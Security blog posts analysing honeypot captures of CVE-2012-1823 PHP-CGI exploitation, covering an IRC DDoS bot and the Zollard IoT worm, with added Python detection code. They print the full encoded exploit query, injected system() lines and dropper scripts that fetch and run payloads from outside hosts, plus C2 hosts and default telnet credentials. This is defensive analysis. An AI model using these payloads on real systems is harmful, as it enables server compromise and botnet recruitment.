If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

"seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed":

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed" script also instructed our server to download "stats.php".  This was also a tar file, which when expanded created a hidden directory named ".d" containing the following files:

Contents of hidden 'd' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's" flooding source code.

Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloaded, our server joined the IRC C2 on antiq.scifi.ro (195.182.159.51).

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 is issued, and the compromised host begins sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS installations, weak SSH passwords, and vulnerable PHP deployments remain a major weak spot in Internet-facing servers.  It's pretty safe to say that if web site administrators do not maintain a regular, stringent patch management program, it's just a matter of 'when', not 'if', they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent of Zollard and the references to the files that will be fetched and executed upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.
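Both this post and the July 2014 post above turn on the same CVE-2012-1823 mechanic: a query string that, once the web server percent-decodes it and splits it on "+", becomes php-cgi command-line switches. The partial encoding in the decoded POST above (%6Fn, suhosin%2Esimulation, disable_fu%6Ections) is the reason a literal-string match on "allow_url_include=on" misses some attempts. As an added example that is not part of either post, the Python below decodes a query string the way the CGI argv path does and classifies it: it looks for php-cgi switches (-d, -n, -s, -c) at token boundaries, lists the injected ini directives, and notes whether the raw query avoided a literal "=" (the condition under which Apache passes the query as arguments; exploits encode it as %3d). The two strings it checks are the ones quoted in the two posts; the benign samples are constructed, and the second decode pass is a detector-side choice for catching double encoding, not something the server itself does.

```python
import re
from urllib.parse import unquote_plus

# Query string exactly as captured in the July 2014 post (the part after "?").
CAPTURED_QUERY_2014 = (
    "%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+"
    "%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+"
    "%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+"
    "%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+"
    "%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+"
    "%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+"
    "%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+"
    "%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+"
    "%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+"
    "%2d%6e"
)

# The partially encoded POST as shown in the Zollard post.
ZOLLARD_DECODED_POST = (
    '-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on '
    '-d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input '
    '-d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n'
)

# php-cgi switches that must never arrive via a query string: -d sets an ini directive,
# -n ignores php.ini, -s prints script source, -c selects a php.ini path.
SWITCH_RE = re.compile(r'(?:^|\s)-[dnsc]\b')
DIRECTIVE_RE = re.compile(r'-d\s+([A-Za-z0-9_.]+)=')

# Directives whose injection disables protections or turns the POST body into code.
DANGEROUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file", "safe_mode",
    "open_basedir", "disable_functions", "cgi.force_redirect",
    "cgi.redirect_status_env", "suhosin.simulation",
}


def decode_query(raw, max_passes=2):
    """Decode as the CGI argv path does ('+' -> space, %xx -> byte).  The optional
    second pass is a detector-side choice to undo double encoding."""
    text = raw
    for _ in range(max_passes):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_query(raw):
    """Return the decoded form plus the individual signals and an overall verdict."""
    decoded = decode_query(raw)
    dangerous = [n for n in DIRECTIVE_RE.findall(decoded) if n in DANGEROUS_DIRECTIVES]
    has_switch = bool(SWITCH_RE.search(decoded))
    # Apache only hands a query string to the CGI as argv when it contains no literal
    # '=', so an encoded-only '=' is a strong corroborating signal.
    no_literal_equals = "=" not in raw
    return {
        "decoded": decoded,
        "option_switch": has_switch,
        "dangerous_directives": dangerous,
        "no_literal_equals": no_literal_equals,
        "verdict": has_switch and (bool(dangerous) or no_literal_equals),
    }


if __name__ == "__main__":
    for label, q in (("2014 capture", CAPTURED_QUERY_2014), ("Zollard", ZOLLARD_DECODED_POST)):
        result = classify_query(q)
        print(label, "->", "injection" if result["verdict"] else "benign")
        print("  decoded:", result["decoded"])
        print("  directives:", ", ".join(result["dangerous_directives"]))
```

Requiring both a switch and either a known-dangerous directive or the absence of a literal "=" keeps ordinary search strings that happen to contain " -d " from alerting, while still catching a lone "-n" or "-s" sent as the whole query.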

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from the 'arm' file (first dump above) and the 'mips' file (second dump above)

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from the 'mipsel' file (first dump above) and the 'ppc' file (second dump above)
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from the 'x86' file (above)
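
The dumps show what the initial delivery looked like on the wire: a POST to one of the /cgi-bin/php* handlers with User-Agent Zollard and a body carrying the myshellexec() dropper that fetches /tmp/x86. As an added example (not from the original post and not the malware's code), here is a Python request classifier that matches those three traits; the request layout and the dropper URL in the constructed sample are assumptions, not captured data.

```python
CGI_PATHS = ("/cgi-bin/php", "/cgi-bin/php5", "/cgi-bin/php-cgi",
             "/cgi-bin/php.cgi", "/cgi-bin/php4")          # handlers listed in the strings dumps
BODY_MARKERS = (b"disable_functions", b"myshellexec", b"wget -O /tmp/")   # from the dropper's PHP


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip().decode("ascii", "replace")
    return method.decode("ascii", "replace"), target.decode("ascii", "replace"), headers, body


def classify_request(raw: bytes):
    """Return the reasons this request matches the Zollard delivery pattern ([] if none)."""
    method, target, headers, body = parse_request(raw)
    path = target.split("?", 1)[0]
    reasons = []
    if headers.get("user-agent", "").lower() == "zollard":
        reasons.append("user-agent Zollard")
    if method == "POST" and path in CGI_PATHS:
        reasons.append(f"POST to php-cgi handler {path}")
    hits = [m.decode() for m in BODY_MARKERS if m in body]
    if hits:
        reasons.append("dropper markers in body: " + ", ".join(hits))
    return reasons


def build_request(method, path, user_agent, body=b""):
    """Assemble a constructed request with a correct Content-Length (sample data, not a capture)."""
    head = f"{method} {path} HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: {user_agent}\r\n"
    if body:
        head += ("Content-Type: application/x-www-form-urlencoded\r\n"
                 f"Content-Length: {len(body)}\r\n")
    head += "Connection: close\r\n\r\n"
    return head.encode() + body


# Constructed samples; the dropper host below is a placeholder, not the one seen in the dumps.
SAMPLE_ATTACK = build_request("POST", "/cgi-bin/php", "Zollard",
    b'<?php $disablefunc = @ini_get("disable_functions"); '
    b'myshellexec("wget -O /tmp/x86 http://malware-host.invalid/x86"); ?>')
SAMPLE_BENIGN = build_request("GET", "/index.html", "Mozilla/5.0")

if __name__ == "__main__":
    for name, req in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(name, classify_request(req) or "no match")
```

An IDS or reverse proxy sees the full request and can use all three reasons; a web server access log normally records only the method, path and User-Agent, so the body markers are the first thing to drop when adapting this to log review, and the User-Agent is trivially changed by the attacker, so the php-cgi path match is the one worth keeping.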

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as on the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host and is not part of this campaign.

We recommend blocking IP address 78.39.232.113 and ensuring that all Internet-facing devices (yes, "devices") are strongly secured.
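
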